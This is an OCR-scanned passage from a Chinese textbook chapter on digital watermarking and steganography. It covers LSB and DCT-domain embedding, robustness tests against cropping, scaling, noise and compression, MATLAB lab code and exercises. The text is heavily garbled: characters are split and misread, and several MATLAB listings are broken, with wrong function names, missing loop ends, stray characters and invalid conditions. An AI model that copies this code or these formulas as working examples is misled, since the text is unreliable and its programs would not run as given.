(1) 将 得 到 的 隐藏 有 秘密 信息 的 十 进 制 像素 值 转 换 为 二 进 制 数据 。 
(2) 将 二 进 制 数据 的 最 低 有 效 位 提取 出 来 , 即 为 秘密 信息 序列 。 
以 上 面 的 载体 块 图 像 L 254 253 255 252 254 252 253 254 254] 为 例 , 先 将 其 像素 值 转换 
为 二 进 制 : 
254 53 255 LlLILILO 11i1110' Lil11L1 
252 254 252—>11111100 11111110 11111100 
253 254 254 11111101 11111110@ 11111110 
提取 其 最 低位 ,过 程 如 下 所 示 
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11111110 11111101 11111111 
11111100 11111110 11111100 一 011000100 
11111101 11111110 11111110 

则 [L011000100 J] 就 是 提取 的 秘密 信息 。 

由 于 载体 图 像 的 每 个 字 节 只 隐藏 一 个 秘密 信息 比特 ,所 以 只 有 当 载 体 图 像 的 大 小 是 秘 
密 信息 大 小 的 8 倍 以 上 时 才能 完整 地 隐藏 秘密 信息 。 

从 效果 看 ,人 眼 很 难 分 辨 原始 图 像 和 经 过 LSB 隐藏 后 的 图 像 , 从 而 达到 了 信息 隐藏 的 
目的 。 如 图 10-1 所 示 ,图 像 (a) 嵌 入 了 图 像 (b) ,嵌入 后 的 图 像 为 (c),(a) 与 (c) 的 外 观 的 确 
没有 明显 差异 。 这 也 说 明 LSB 算法 的 不 可 感知 性 很 高 。 但 是 这 种 顺序 嵌入 很 容易 被 破解 ， 
因此 存在 着 很 大 的 安全 隐患 ,为 了 解决 这 一 问题 ,实际 应 用 中 往往 引入 伪 随 机 函数 ,随机 选 
取 


图 像 的 像素 点 ,再 将 信息 隐藏 进去 。 
数 字 
水 印 


(a) 原始 图 像 (b) 秘密 信息 (c) 伐 入 后 的 图 像 
图 10-1 LSB 原始 图 像 与 嵌入 信息 后 的 图 像 对 比 


10.2.2 空域 算法 分 析 


LSB 虽然 算法 简单 直观 ,易于 实现 。 但 由 于 是 在 空域 的 直接 变换 , 当 载体 图 像 面 临 前 
裁 . 缩 放 、 噪 声 等 的 攻击 时 ,水 印 的 完整 性 值得 研究 。 

1. 剪裁 攻击 

剪裁 就 是 将 图 的 一 块 数据 设置 为 0。 对 载体 图 像 进行 剪裁 处 理 后 ,提取 的 水 印 势必 会 
相应 地 丢失 一 部 分 。 由 图 10-2 可 见 ,LSB 算法 抵抗 剪裁 攻击 的 能 力 是 很 差 的 。 


一 
水 印 


(a) 剪裁 含水 印 图 像 (b) 剪裁 后 提取 的 水 印 
图 10-2 剪裁 对 LSB 算 法 的 影响 


2. 压缩 攻击 


压缩 攻击 对 水 印 提取 的 影响 也 是 很 大 ,无 论 是 放大 还 是 缩小 ,都 对 水 印 造 成 了 很 大 的 破 
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坏 , 如 图 10-3 所 示 。 这 说 明 LSB 算法 对 来 自 空域 和 频 域 的 攻击 抵抗 都 很 弱 。 


(a) 载体 图 像 缩小 1/2 时 提取 的 水 印 (b) 载体 图 像 放 大 2 倍 时 提取 的 水 印 
图 10-3 图 像 缩 放 对 水 印 提取 的 影响 


3. 噪声 攻击 
给 载体 图 像 中 加 入 均值 为 0 ,方差 为 0.01 的 高 斯 白 噪 声 , 再 提取 水 印 , 结 果 如 图 10-4 
所 示 。 


(a) 载体 图 像 加 入 高 斯 白 品 声 (b) 载体 图 像 加 入 噪声 后 提取 的 水 印 
图 10-4 白 噪声 对 水 印 提取 的 影响 


通过 上 面 的 实验 分 析 可 见 ,LSB 算法 实现 比较 简单 ,不 可 感知 性 很 高 ,但 面 对 来 自 时 域 
和 频 域 的 攻击 时 ,都 会 很 大 程度 上 影响 隐藏 信息 的 提取 。 载 体 图 像 受 到 缩放 、 剪 裁 、 品 声 等 
攻击 时 ,都 将 严重 破坏 水 印 的 完整 性 ,这 说 明基 本 LSB 算法 的 鲁 棒 性 很 低 。 因 而 实际 应 用 
过 程 中 往往 加 入 循环 元 余 校 验 码 (CRC) 来 降低 误 码 率 ,使 用 校 验 码 能 一 定 程度 上 增强 LSB 
算法 对 空域 攻击 的 抵抗 力 ,但 抵抗 来 自 变 换 域 的 攻击 效果 仍 不 是 很 明显 ,因为 LSB 是 对 空 
域 进行 直接 的 信息 戏 入 ,经 过 压缩 加 噪 后 对 空域 数值 的 影响 很 大 。 

实验 10-1 空域 LSB 算法 图 像 数 字 水 印 实验 

【实验 目的 】 

(1) 掌握 对 图 像 的 基本 操作 。 

(2) 能 够 用 LSB 算法 对 图 像 进行 信息 隐藏 。 

(3) 能 够 用 LSB 提取 算法 提取 隐藏 进 图 像 的 信息 。 

【实验 原理 】 

在 灰 度 图 像 中 ,每 个 像素 通常 为 8 位 ,每 一 位 的 取 值 为 0 或 1。 在 数字 图 像 中 ,每 个 像 
素 的 各 个 位 对 图 像 的 贡献 是 不 同 的 。 对 于 8 位 的 灰 度 图 像 , 每 个 像素 的 数据 g 可 用 公式 表 
示 为 
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舌 三 * 
其 中 ,i 表示 像素 的 第 几 位 ,6; 表 示 第 i 位 的 取 值 ,b;€10,1)。 

这 样 便 可 以 把 整个 图 像 分 解 为 8 个 位 平面 , 即 从 最 低 有 效 位 (LSB) 到 最 高 有 效 位 
(MSB) 。 从 位 平面 的 分 布 来 看 , 随 着 位 平面 从 低 到 高 ( 即 从 位 平面 0 到 位 平面 7) ,位 平面 图 
像 的 特征 逐渐 变 得 复杂 ,细节 不 断 增加 。 到 了 比较 低 的 位 平面 时 ,单纯 从 一 幅 位 平面 上 已 经 
逐渐 不 能 看 出 和 测试 图 像 的 信息 了 。 由 于 低位 所 代表 的 信息 很 少 ,改变 低位 对 图 像 的 质量 
没有 太 大 的 影响 。LSB 方法 正 是 利用 这 一 点 在 图 像 低 位 隐藏 水 印信 息 。 

LSB 算法 虽然 可 以 隐藏 信息 ,但 隐藏 的 信息 可 以 被 轻易 移 去 ,无 法 满足 数字 水 印 的 鲁 
棒 性 要 求 ,现在 的 数字 水 印 软件 已 经 较 少 采 用 LSB 算法 。 

数字 图 像 水 印 处 理 过 程 主 要 包括 水 印 生 成 .嵌入 和 检测 3 个 步骤 。 而 整个 水 印 系统 还 
应 包括 外 界 的 攻击 过 程 。 图 10-5 .图 10-6 分 别 是 水 印信 号 的 嵌入 和 水 印 提取 模型 。 
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图 10-5 水 印信 号 嵌入 模型 
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图 10-6 水 印 提取 模型 


【实验 内 容 】 
假设 原始 图 像 为 lena. bmp, 水 印 图 像 为 watermark. bmp, 椒 入 水 印 后 图 像 为 
watertest. bmp 。 


将 水 印 嵌 入 原始 图 像 文件 中 。 其 MATLAB 代码 如 下 : 


C=imread ('lena.bmp'); 
m= imread ('watermark .bmp'); 
Mc= size (C,1); 
Nc= size (C,2); 
Mm= size (mv1)7 
Nm= size (m, 2); 
watertest=C; 
for i=1:Mc 
for j=1:Nc 
W i(i,j)=bitset (watertest (i,j),1,m(i,j)); 
end 


imwrite (watertest, "1sb w.bmp'，'bmp')7 
figure (1) 7 

imshow (watertest) 

title(" 嵌 和 水印 后 

figure (2) 

imshow (C, [ ]) 

title(' 由 入 水 印 前 ') 

figure (3) 

imshow (m, [ ]) 


title(' 水 印 图 片 ') 


【实验 要 求 】 

(1) 比较 隐藏 信息 前 后 的 载体 ( 即 原始 图 像 矩 阵 和 隐藏 后 的 信息 图 像 和 矩阵 ) ,观察 变化 
情况 。 

要 点 : 将 隐藏 前 后 的 图 像 用 imread() 读 入 到 两 个 矩阵 中 , 求 这 两 个 矩阵 的 差 ,观察 其 中 
0 和 1 的 位 。 

(2) 写 出 水 印 提 取 算 法 的 MATLAB 程序 。 

要 点 : 类 似 嵌 入 水印 程 序 , 用 一 个 二 重 循环 语句 。 主 要 函数 是 bitget() 。 

(3) 保存 伪装 载体 ,对 伪装 载体 进行 剪裁 .缩放 ,噪声 等 的 攻击 , 写 出 相应 的 MATLAB 
程序 ,再 在 其 中 提取 保密 信息 ,与 攻击 前 的 相 比较 , 写 出 比较 结果 ,分 析 原 因 。 

要 点 : 主要 函数 是 噪声 imnoise() ,缩放 imresize()、 旋 转 imrotate()。 例 如 ,加 入 椒盐 
噪声 imnoise(I,salt & pepper',0.02) ,高 斯 噪声 imnoise(I,gaussian) 等 。 

(4) 用 PSNR NC 客观 评价 (3) 的 载体 图 像 , 并 加 以 分 析 。 

要 点 : 编写 PSNR、NC 函数 。 

Q@ PSNR 的 MATLAB 公式 如 下 : 

PSNR=10 log 10((2n—1)’/MSE) 

其 中 ,MSE 是 原 图 像 与 处 理 图 像 之 间 的 均 方 误差 。 PSNR 是 原 图 像 与 被 处 理 图 像 之 间 的 均 
方 误差 相对 于 (2n 一 1)? 的 对 数值 (信号 最 大 值 的 平方 ,n 是 每 个 采样 值 的 比特 数 ) ,其 单位 是 
dB。PSNR 值 越 大 ,就 代表 失真 越 少 。 

计算 PSNR 的 MATLAB 程序 如 下 : 


function PSNR=psnr (f1, £2) 
ml= imread ('fl1.bmp'); 
m2= imread ('f2.bmp'); 
if(size (ml))~= (size (m2)) 

error(' 错 误 : 两 个 输入 像 象 的 大 小 不 一 致 '); 
end 
[m,n]= size (m1); 
A=double (ml); 
B=double (m2); 
D= sum(sum( (A- B) .~2)); 
MSE=D/ (mx n); 
if D==0 
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error(' 两 幅 图 像 完 全 一 样 '); 
PSNR= 200; 
else 
PSNR= 10* log10( (255^2) /MSE) ; 
end 


return 


@ 用 NC( 归 一 化 相关 系数 衡量 提取 水 印 与 原始 水 印 的 相似 程度 。 
计算 NC 的 MATLAB 函数 如 下 : 


function dNC= nc (ImageA, ImageB) 
if(size (ImageA,1)~=size(ImageB,1))or (size(ImageA,2)~=size (ImageB, 2)) 
error('ImageA<> ImageB') 7 
dNC= 0; 
return; 
end 
ImageA= double (ImageA); 
ImageB= double (ImageB); 
M= size (ImageA,1); 
N= size (ImageA, 2); 
dl=0，; 
d2=0; 
d3=0; 
for i=1:M 
for j=1:N 
dl=dl+ ImageA (i,j) * ImageB (i,j); 
d2=d2+ ImageA (i,j) * ImageA(i,j); 
d3=d3+ ImageB (i,j) * ImageB (i,j); 
end 
end 
dNC=d1/ (sqrt (d2) * sqrt (d3)); 


return 


10.2.3 变换 域 算法 


变换 域 算法 是 在 对 原始 载体 图 像 进行 各 种 变换 的 基础 上 嵌入 水 印信 息 , 与 空域 水 印 算 
法 不 同 的 是 ,变换 域 算法 中 水 印信 息 可 分 布 到 所 有 像素 上 ,嵌入 的 数据 不 会 被 肉眼 所 察觉 ， 
有 利于 保证 水 印 的 不 可 见 性 , 且 能 较 好 地 抗击 滤波 .几何 变形 等 , 鲁 棒 性 高 。 常 用 的 变换 域 
算法 主要 包括 离散 余弦 变换 (DCT) .离散 传 里 叶 变 换 (DFT) 和 离散 小 波 变换 (CDWT) 等 。 此 
处 主要 讨论 DCT 算法 。 

DCT(Discrete Cosine Transform) 技 术 是 一 种 在 数据 压缩 中 常用 的 变换 编码 方法 。 它 
把 正 交 矩阵 的 时 序 信 号 变 为 频率 信号 ,是 一 种 近似 于 傅 里 叶 变 换 的 正 交 变换 。 这 种 变换 具 
有 输入 序列 的 功率 (平方 和 ) 同 变换 序列 的 功率 相等 的 特点 。 即 如 果 在 某 一 地 方 由 于 变换 导 
致 功率 集中 , 则 其 他 部 分 的 功率 将 变 小 。 图 像 信 号 具有 在 低频 段 时 功率 集中 的 特性 ,使 高 频 
段 的 功率 变 小 。 另 外 .人 眼 对 高 频段 信号 的 视觉 特性 也 不 太 灵 敏 。 利 用 这 些 特性 ,可 对 低频 
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段 部 分 进行 细 量 化 ,而 对 高 频段 部 分 进行 粗 量化 。 由 于 任何 连续 的 实 对 称 函 数 的 传 里 叶 变 
换 中 只 含有 余弦 项 ,因此 ,DCT 与 傅 里 叶 变换 一 样 有 很 明显 的 物理 意义 。DCT 先 将 图 像 分 
成 NX N 像素 块 (一 般 取 N==8, 即 64 个 像素 块 ) ,再 对 NXN 块 像素 逐一 进行 DCT 变换 ， 
其 转换 示意 图 如 图 10-7 所 示 。 


2 
性 u 


图 10-7 DCT 变换 示意 图 


二 维 数据 块 (z,y) 经 DCT 变换 成 8X8 个 变换 域 系数 (u,v)。 其 中 代表 水 平 像素 号 ， 
v 代表 垂直 像素 号 。 如 果 w= 二 0、v==0,T(0,0) 是 原来 的 64 个 样 值 的 平均 值 ,相当 于 直流 分 
量 , 随 着 .wv 值 增加 ,相应 的 系数 分 别 代 表 逐 步 增加 的 水 平 空间 频率 分 量 和 垂直 空间 频率 分 
量 的 大 小 。 

由 于 大 多 数 图 像 高 频 分 量 较 小 ,相应 地 图 像 高 频 成 分 的 系数 多 数 为 0, 再 加 上 人 眼 对 高 
频 成 分 的 失真 不 太 敏 感 ,可 以 用 更 粗 的 量化 ,在 保证 所 要 求 的 图 像 质量 下 ,舍弃 某 些 次 要 信 
息 ,使 传送 变换 系数 所 用 的 数据 率 远 远 小 于 传送 像素 所 用 的 数据 率 。 数 据 传送 到 接收 端 后 ， 
再 通过 离散 余弦 反 变 换 ( 即 IDCT) 变 回 到 样 值 。 这 样 图 像 虽 然 有 一 定 的 失真 ( 即 有 损 压 
缩 ) ,但 对 人 了 眼 来 说 是 可 以 接受 的 。 在 对 语音 信号 、 图 像 信 号 的 变换 中 ,DCT 变换 被 认为 是 
一 种 准 最 佳 变 换 。 

设 数字 图 像 是 具有 M 行 N 列 的 矩阵 ,为 了 同时 减弱 (或 去 除 ) 图 像 数据 相关 性 ,可 以 运 
用 二 维 DCT ,将 图 像 从 空间 域 转换 到 DCT 变换 域 。 


二 维 离散 余弦 变换 定义 如 下 : 
设 f(x,y) 为 MXN 的 数字 和 矩阵, 则 
M1 N= 
2， "六 2x ur. . (2y+ 1)vn 
F(u,v) = NN 2 HD CHO OD eo 5M cos DN 
式 中 ,rz 一 0,1,…,M 一 1iy,u 一 0,1.…,N 一 1。 
二 维 离散 余弦 反 变 换 定义 如 下 : 
M-1 N 一 1 
f(r,y) = 二 > CWC Fu veos (2 eos (2y 2 ) un 


式 中 ,zx 一 0,1,…,M 一 1;jyo= 一 0.1.…,N 一 1。 
离散 余弦 变换 的 计算 量 相 当 大 。 在 实际 使 用 时 ,在 MATLAB 中 ,函数 dct2 和 函数 
idet2 分 别 用 于 进行 二 维 DCT 和 二 维 IDCT。 
第 一 种 方法 是 使 用 函数 dct2 ,该 函数 使 用 一 个 基于 FFT 的 快速 算法 来 提高 当 输入 较 大 
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的 方 阵 时 的 计算 速度 。dct2 函数 的 调用 格式 如 下 : 
B=dct2 (A, [M N]) 

或 
B= dct2 (A,M, N) 


其 中 ,A 表示 要 变换 的 图 像 ,M 和 N 是 可 选 参数 ,表示 填充 后 的 图 像 矩阵 大 小 。B 表示 变换 
后 得 到 的 图 像 矩 阵 。 

第 二 种 方法 是 使 用 函数 dctmtx 返回 的 DCT 矩阵 ,这 种 方法 适合 于 较 小 的 输入 方 阵 。 
dctmtx 的 调用 格式 如 下 : 


D= dctmtx (N) 


其 中 ,N 表示 DCT 矩阵 的 维 数 ,D 为 DCT 和 矩阵。 
例如 ,下 面 的 MATLAB 程序 将 输入 图 像 进行 dct2 和 idect2 变换 ,其 输出 结果 如 图 10-8 
所 示 。 


A=imread ('e.jpg'); 

A= rgb2gray (A); 

imshow (A); 

title(' 原 始 灰 度 图 像 ') 

C=dct2 (A); 进行 余弦 变换 

figure; 

imshow (C); 

title(' 余 弦 变 换 后 图 像 )， 

figure; 

B=1o0g (abs (C)); 

imshow (B) 

title(' 系 数 分 布 '); 

colormap (jet (64) ) ; s 显 示 为 64 级 灰 度 

colorbar; $s 显示 颜色 条 ,显示 变换 后 的 系数 分 布 

Clabs (C)<10)=0; s 将 DcT 变换 后 的 系数 值 小 于 10 的 元 素 设 为 0 

D= idct2(C) ./255; s# 对 pcT 变 换 值 归 一 化 ,进行 余弦 反 变 换 

figure; 

imshow (D) ， 

title(' 余 弦 反 变换 后 图 像 ') 

在 DCT 的 变换 编码 中 ,图 像 是 先 经 分 块 (通常 是 8X8 或 16X16) 后 再 作 DCT。 得 到 的 
DCT 图 像 有 3 个 特点 : 

(1) 系数 值 全 部 集中 到 0 值 附近 ,动态 范围 很 小 ,说 明 用 较 小 的 量化 比特 数 即 可 得 到 
DCT 系数 。 

(2) DCT 后 图 像 能 量 集中 在 图 像 的 低频 部 分 , 即 DCT 图 像 中 不 为 0 的 系数 大 部 分 集 
中 在 一 起 (左上 角 ) ,因此 编码 效率 很 高 。 

(3) 没有 保留 原 图 像 块 的 精细 结构 ,从 中 反映 不 了 原 图 像 的 边缘 、 轮 廓 等 信息 ,这 一 特 
点 是 由 DCT 缺乏 时 域 性 造成 的 。 
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(a) 原始 灰 度 图 


EE 


(b) 余弦 变换 后 图 像 (c) DCT 系 数 的 光谱 表示 (d) 余弦 反 变换 后 图 


将 


图 10-8 图 像 dct2 和 idct2 变换 实例 
如 图 10-9 所 示 , (a) 是 原始 
的 低频 
左上 角 
接近 0。 


图 像 ,(b) 是 变换 后 DCT 域 系 数 分 布 图 ,两 条 线 划分 出 图 像 
、\ 中 频 和 高 频 分 别 所 在 的 矩形 区 域 。 由 图 可 见 , 经 过 DCT 后 大 部 分 参数 接近 0, 只 有 
的 低频 部 分 有 较 大 的 数值 ,中 频 部 分 参数 值 相对 较 小 ,而 大 部 分 高 频 参 数值 非常 小 ， 


(a) 原始 图 像 


(b) 变换 后 DCT 域 系数 分 布 
图 10-9 DCT 域 系数 分 布 
DCT 算法 实现 过 程 如 下 : 
(1) 计算 图 像 和 水 印 的 离散 余弦 变换 。 


(2) 将 水 印 到 加 到 DCT 域 中 幅 值 最 大 的 前 上 个 系数 上 ,通常 是 图 像 的 低频 分 量 。 
若 DCT 系数 的 前 & 个 最 大 分 量 表 示 为 


P;={d}, i=1,2,.,k 


水 印信 息 为 


则 水 印 的 嵌入 算法 为 
P= P;+W;Xa 

其 中 常数 a 为 尺度 因子 ,用 来 控制 水 印 添加 的 强度 。 

(3) 用 新 的 系数 反 变换 得 到 水 印 图 像 T。 

(4) 解码 函数 则 分 别 计算 原始 图 像 工 和 水 印 图 像 工 的 离散 余弦 变换 ,并 提取 岩 入 的 水 
印 W“ ,再 做 相关 检验 以 确定 水 印 存在 与 否 。 

相关 模型 表示 如 图 10-10 所 示 。 

在 水 印 嵌 人 时 通常 选取 中 频 区 域 。 因 为 低频 区 域 对 视觉 最 为 敏感 ,在 此 处 隐藏 秘密 信 
息 会 降低 隐蔽 性 ;而 高 频 区 域 是 图 像 压 缩 的 主要 区 域 , 在 此 处 隐藏 达 不 到 较 好 的 鲁 棒 性 ; 相 
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[ 原始 图 像 一 | DCT 变换 DEF 含水 
系数 =| 反 DCT 变 换 上 一 | 印 的 
[ 水印 图 像 上 ~| DCT 变 换 | -~| 组合 图 像 


(a) 水 印 嵌入 


提取 


{ 人 一 


待 测 图 像 
水 印 | 提取 的 水 印 | ~| ”水 印 检测 


(9 水 印 提取 和 检测 
图 10-10 水 印迹 入 与 提取 检测 模型 


比 之 下 ,中 频 区 域 是 最 佳 的 隐藏 点 ,能 兼顾 嵌入 图 像 的 隐藏 性 和 和 鲁 棒 性 。 
10.2.4 变换 域 算法 分 析 


不 可 见 性 、 鲁 棒 性 和 安全 性 是 数字 水 印 的 三 个 主要 特点 ,也 是 水 印 系统 测试 的 主要 方 
面 ,嵌入 的 信息 必须 能 够 抵抗 一 些 攻击 。 下 面 假设 嵌入 水 印 后 载体 图 像 是 D, 受 攻击 后 图 像 
是 R, 从 R 提取 的 水 印 是 W。 

1. JPEG 压缩 攻击 

使 用 函数 : 


imwrite(D, 'yingwu256 C_JPEG.jpg', 'mode','lossy', 'quality',qua); 

R= imread ('yingwu256 C_JPEG.jpg'); 

qua 表示 有 损 压缩 的 质量 , 取 值 范围 为 0~100, 取 值 越 大 ,压缩 质量 越 好 。 然 后 提取 压 
缩 后 的 水 印 W。 

2. 缩放 攻击 

使 用 函数 : 


R= imresize (D, scale); 


分 别 取 旋 转角 度 scale 为 1.2、4, 然 后 提取 缩放 后 的 水 印 W。 
3. 旋转 攻击 
使 用 函数 : 


R= imrotate (D,angle,, 'bilinear', 'crop'); 

分 别 取 旋转 角度 angle 为 10、20、45 ,然后 提取 旋转 后 的 水 印 W。 

4. 裁剪 攻击 

使 用 函数 : 

D(l:n,1:n)=0; 

分 别 取 n 为 32、64、128, 然 后 提取 裁剪 后 的 水 印 W。 

利用 DCT 域 嵌入 水 印 后 ,水 印 的 不 可 见 性 较 好 ,图 像 在 嵌入 水 印 前 后 视觉 效果 改变 不 


大 ,不 影响 图 像 的 正常 使 用 。 从 各 种 攻击 后 提取 的 水 印 效 果 看 ,一 般 还 能 从 中 提取 出 较 清 晰 
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的 水 


水 印 
原 图 


印信 息 。 可 见 , 这 种 诅 入 算法 的 抗 攻 击 性 较 好 ,而 且 检 测 和 提取 易于 实现 。 

实验 10-2 ”变换 域 算法 实验 

【实验 目的 】 

(1) 了 解 DCT 的 基础 知识 。 

(2) 了 解 DCT 算法 原理 。 

(3) 掌握 DCT 算法 的 MATLAB 编程 方法 。 

【实验 原理 】 

嵌入 可 见 水 印 时 ,首先 对 原 图 像 进行 预 处 理 ,将 预 处 理 的 结果 进行 DCT, 与 此 同时 ,将 
图 像 进行 DCT ,并 将 变换 的 结果 进行 预 处 理 。 然 后 ,将 水 印 图 像 的 变换 域 的 值 琶 加 到 
像 的 变换 域 的 指定 频段 ,可 见 水 印 与 不 可 见 水 印 的 嵌入 位 置 的 选择 不 同 。 之 后 再 进行 


IDCT , 即 可 输出 一 幅 嵌 入 可 见 水 印 后 的 图 像 。 其 中 预 处 理 部 分 不 是 必需 的 ,对 原 图 像 进行 


预 处 
位 置 
放 在 


变换 
位 置 
低频 
以 上 
延续 


理 的 目的 是 提高 处 理 速度 ,对 水 印 图 像 的 预 处 理 目 的 是 提高 水 印 的 保密 性 。 预 处 理 的 
也 不 是 固定 的 ,对 水 印 图 像 的 预 处 理 如 果 放 在 DCT 之 后 , 则 对 变换 域 进行 置 乱 ;如 果 
DCT 之 前 , 则 是 对 水 印 图 像 的 空域 进行 置 乱 。 

水 印 提取 时 ,首先 将 嵌入 水 印 后 的 图 像 进行 DCT ,与 此 同时 将 原 图 像 也 进行 离散 余弦 
,然后 将 两 幅 图 像 变换 后 输出 的 DCT 域 的 结果 进行 相 减 , 相 减 后 得 到 的 结果 需要 进行 
调整 才能 在 经 过 后 面 的 反 变换 后 输出 正常 的 水 印 图 像 。 例 如 ,如 果 嵌 入 时 选择 的 是 中 
代入 , 即 戏 入 不 可 见 水 印 , 则 相当 于 是 把 水 印 图 像 DCT 域 的 整体 放 在 了 原 图 像 中 低频 
的 区 域 ,这 样 , 相 减 后 水 印 图 像 的 DCT 域 不 是 从 零 频 开始 的 ,而 是 从 中 低频 开始 向 后 
的 ,所 以 需要 经 过 位 置 调整 将 相 减 后 的 结果 调整 至 从 零 频 开始 。 

【实验 内 容 】 

(1) 准备 原始 图 像 lena. bmp。 

(2) 编写 MATLAB 程序 。 示 例 程 序 如 下 : 


$ 定 义 常量 


size=256; 


block= 8; 

blockno= size/block; 

LENGTH= size* size/64; 

Alphal= 0.02; 

Alpha2= 0.1; 

T1=37 

I= zeros (size, size); 

D= zeros (size, size); 

BW= zeros (size, size); 

block detl= zeros (block,block); 

s 产生 高 斯 水 印 , 并 显示 水 印信 息 

randn('seed',10); 

mark= randn (1, LENGTH); 

subplot (2,2,1); 

Plot (mark); 

title(' 水 印 : Gaussian noise'); 
2 97 * 


$s 显示 原 图 
subplot (2,2,2); 
I=imread('lena.bmp'); 
imshow (I); 
title(' 原 始 图 像 : 工 '); 
$ 显 示 prewitt 为 算 子 的 边缘 图 
BW= edge (I, 'prewitt'); 
subplot (2,2,3); 
imshow (BW); 
title('edge of origine image'); 
$ 幅 入 水 印 
k=1; 
for m= 1:blockno 
for n=1:blockno 
X= (m-1) * block+17 
y= (n-1) * block+1; 
block detl=I(x:x+block-1,y:y+block- 1); 
block detl= dwt2 (block detl); 
BW 8_8=BW (x:x+block-1,y:y+block- 1); 
if m=1 | n<=1 
T=0; 
else 
T=sum(BW 8_8);T1= sum(T); 
end 
还 TTL 
Alpha= Alpha2; 
else 
Alpha=Alphal; 
end 
block dctl1(1,1)=block dctl (1,1) * (1+ Alpha* mark (kK)); 
block detl= idct2 (block detl1); 
D(x:x+block- 1,y:y+block-1)=block detl; 
k=k+1; 
end 
end 
$s 显示 嵌入 水 印 后 的 图 像 
subplot (2,2,4); 
imshow (D, [ ]); 
title('embeded image: D') 


【实验 要 求 】 


(1) 分 析 以 上 程序 ,指出 信息 隐藏 采用 了 什么 算法 。 
(2) 分 析 说 明 DCT 域 隐藏 的 容量 。 


(3) 仿照 本 例 ,比较 图 像 分 别 在 高 频 . 中 频 、 低 频 进 行 信息 隐藏 时 ,其 隐藏 前 和 隐藏 后 载 


体 图 像 的 变化 。 
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要 点 : 图 像 在 高 频 、 中 频 、 低 频 隐藏 信息 后 ,其 差别 很 难 用 肉眼 观察 出 来 。 可 用 峰值 信 
品 比 PSNR 量化 ,以 便 评价 。 

(4) 对 茂 有 信息 的 高 频 、 中 频 \ 低 频 3 个 图 像 文件 分 别 作 JPEG 压缩 ,之 后 进行 信息 提 
取 , 改 变 压 缩 倍数 ,考察 不 同 参数 隐藏 抵抗 压缩 的 能 力 。 

(5) 分 析 说 明 为 什么 要 将 信息 隐藏 在 中 频 位 置 。 


习 题 10 


1. 选择 题 
(1) 密码 术 主 要 是 ( ) ,而 隐藏 术 主要 是 ( hs 
A. 对 秘密 信息 本 身 进行 保护 B. 掩盖 信息 存在 的 事实 
(2) 数字 版 权 管 理 主 要 采用 数据 加 密 、 版 权 保 护 、 数 据 签名 和 ( )s 
A. 数字 水 印 B. 防 自 改 C. 访问 控制 D. 密 钥 分 配 


2. 下 面 是 一 段 MATLAB 程序 ,用 LSB 技术 实现 在 图 像 mode. bmp 中 隐藏 消息 文件 
ciphertext. txt, 隐藏 后 的 图 像 文 件 是 demo. bmp。 请 写 出 其 LSB 实现 秘密 消息 提取 的 
程序 。 


% 艇 人 消息 文件 

Cover= imread ('mode.bmp ')7 

ste_over= cover; 

ste_cover=double (ste cover); 

f_ id=fopen('ciphertext .txt', 'r'); 
[msg, len total]= fread (f id, 'ubit1'); 
[m,n]= size (ste_cover); 

if len total>m*n 


error(' 后 和 人 消息 量 太 大 ,请 更 换 图 像 文件 '); 


end 
p=1; 
for f2=1:n 
for fl= 1:m 
ste_cover (fl1,f2)= ste_cover (f1, £2)-mod (ste_cover (£1,£2),2)+msg (p, 1); 
if p==len total 
break; 
end 
p=p+1; 
end 


if p==len total 
break; 

end 
end 
ste_cover=uint8 (ste_cover); 
imwrite (ste_cover, 'demo .bmp'); 
subplot (1,2,1) ;imshow (cover) ;title (' 原 始 图 像 '); 
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subplot (1,2,2) ;imshow ("demo.bmp')7Title(' 隐 藏 信息 后 的 图 像 ); 


3. 以 任意 大 小 的 RGB 图 像 的 某 一 层 为 载体 ,用 MATLAB 实现 LSB 信息 隐藏 和 提取 

(1) 能 随机 选择 嵌入 的 位 置 。 

(2) 嵌入 位 均匀 分 布 于 载体 中 。 

(3) 对 所 实现 的 隐藏 和 提取 算法 进行 详细 描述 ,并 画 出 流程 图 。 

(4) 给 出 实验 结果 。 

(5) 对 隐藏 图 像 进行 一 些 攻击 分 析 , 从 而 说 明 LSB 算法 的 安全 性 。 

4. 数字 水 印 实验 。 

常用 的 数字 水 印 频 域 转换 的 方法 有 离散 傅 里 叶 变 换 (DFT) 离散 余弦 变换 (DCT) 和 离 
散 小 波 变换 (CDWT)3 种 。 要 求 分 别 采用 这 3 种 频 域 变换 方法 对 同一 幅 图 像 进 行 水 印信 息 
的 加 载 ,检测 这 3 种 方法 的 不 可 见 性 和 和 鲁 棒 性 ,比较 这 3 种 频 域 变换 方法 的 优 劣 。 

实验 过 程 主 要 是 : 首先 ,通过 采用 离散 传 里 叶 变 换 、 离 散 余 弦 变 换 、 离 散 小 波 变换 这 
3 种 变换 方法 ,将 载体 图 像 从 空域 转换 到 频 域 , 修 改 相应 的 频 域 系 数 , 嵌 入 水 印信 息 ,从 而 得 
到 含水 印 的 数字 图 像 A、B、.C。 其 次 ,攻击 这 个 含水 印 的 数字 图 像 , 并 提取 水 印信 号 。 再 次 ， 
对 未 受 攻击 的 含水 印 的 图 像 进 行 水 印信 号 的 提取 。 最 后 ,将 攻击 后 检测 到 的 水 印信 号 与 未 
受 攻击 时 提取 的 水 印信 号 相 比 较 , 分 析 这 3 种 变换 的 优点 。 具 体 实验 步骤 如 下 : 

(1) 制作 水 印 图 像 。 

(2) 选择 载体 图 像 (例如 采用 lena 图 像 ) .分别 用 离散 傅 里 叶 变 换 .离散 余弦 变换 和 离散 
小 波 变 换 对 其 租 入 水 印信 号 ,得 到 含有 水 印 的 数字 图 像 A、B、C。 

(3) 在 未 受 攻击 的 情况 下 ,提取 各 自 的 水 印 图 像 。 

(4) 分 别 对 A、B、C 这 3 张 图 像 做 剪 切 、 品 声 \ 污 染 、 旋 转 攻 击 。 

(5) 对 攻击 后 的 图 像 进 行 水 印 提取 ,与 未 受 攻击 所 提取 到 的 水 印信 号 相 比 较 , 检 测 其 
PSNR 值 和 NC 值 ,并 综合 分 析 3 种 算法 的 优 劣 。 

5. 基于 DCT 变换 的 信息 隐藏 算法 实验 。 

载体 图 像 为 24 位 bmp 图 像 Lena. bmp ,嵌入 的 秘密 信息 为 从 屏幕 上 随机 输入 的 文本 信 
息 ,要求 对 载体 图 像 Lena. bmp 进行 颜色 分 量 分 解 与 离散 余弦 变换 ,将 秘密 信息 转换 成 二 进 
制 流 并 嵌入 到 载体 图 像 的 DCT 变换 域 中 ,显示 原 载体 图 像 . 需 要 嵌入 的 秘密 信息 及 其 相应 
的 二 进 制 流 . 嵌 入 了 秘密 信息 的 伪装 载体 ,提取 的 秘密 信息 。 

要 求 ， 

